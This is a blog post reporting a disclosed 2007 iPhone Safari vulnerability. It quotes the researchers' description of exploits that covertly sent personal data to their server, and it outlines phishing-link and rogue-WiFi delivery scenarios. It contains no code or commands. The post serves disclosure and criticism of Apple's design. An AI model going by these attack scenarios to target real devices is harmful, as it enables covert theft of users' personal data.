Remote control flaw found in iPhone
Independent Security Evaluators discovered the problem, developed a patch and alerted Apple to the exploits on 17 July 2007. Vulnerability details will be withheld until 2 August to allow Apple to patch the vulnerabilities.
ISE reports that "The most glaring is that all processes of interest run with administrative privileges. This implies that a compromise of any application gives an attacker full access to the device."
Why on earth would Apple grant so many processes admin rights? Did they not learn any lessons from watching us struggle with security problems made worse by the fact that programs insist that they have admin rights to be able to run? Have they not heard of Susan Bradley's Local Administrator/Power User/Non support of Patching/UAC Hall of Shame?
ISE goes on to report that:
"To demonstrate these security weaknesses, we created an exploit for the Safari browser on the iPhone. We used an unmodified iPhone to surf to a malicious HTML document that we created. When this page was viewed, the payload of the exploit forced the iPhone to make an outbound connection to a server we controlled. The compromised iPhone then sent personal data including SMS text messages, contact information, call history, and voice mail information over this connection. All of this data was collected automatically and surreptitiously. After examination of the filesystem, it is clear that other personal data such as passwords, emails, and browsing history could be obtained from the device. We only retrieved some of the personal data but could just as easily have retrieved any information off the device.
Additionally, we wrote a second exploit that performs physical actions on the phone. When we viewed a second HTML page in our iPhone, it ran the second exploit payload which forced it to make a system sound and vibrate the phone for a second. Alternatively, by using other API functions we discovered, the exploit could have dialed phone numbers, sent text messages, or recorded audio (as a bugging device) and transmitted it over the network for later collection by a malicious party."
Attack scenarios
Email - "A link to a malicious site can be included in an email sent to the victim. When the victim clicks the link, they will be taken to the webserver containing the malicious HTML and the exploit will take control of their device."
Man in the middle - "An attacker could set up and advertise a free WiFi hotspot in a heavily populated area. The iPhone will automatically seek these out and ask the user to connect to them. Once connected, all traffic from the victim will pass through the attacker controlled wireless router. The attacker can intercept and change any HTTP traffic intended for the victim. This traffic can invisibly be modified to contain the iPhone exploit code. Again, complete control will be obtained over the iPhone. This time the only actions performed by the victim include using an unsafe WiFi connection and surfing to any website. WiFi connection and surfing to any website. This last scenario is aided by the fact that iPhones advertise their existence via HTTP headers. In this manner the exploit code can be delivered only to iPhones and not other devices and browsers."
ISE's full report can be downloaded here:
http://www.securityevaluators.com/iphone/exploitingiphone.pdf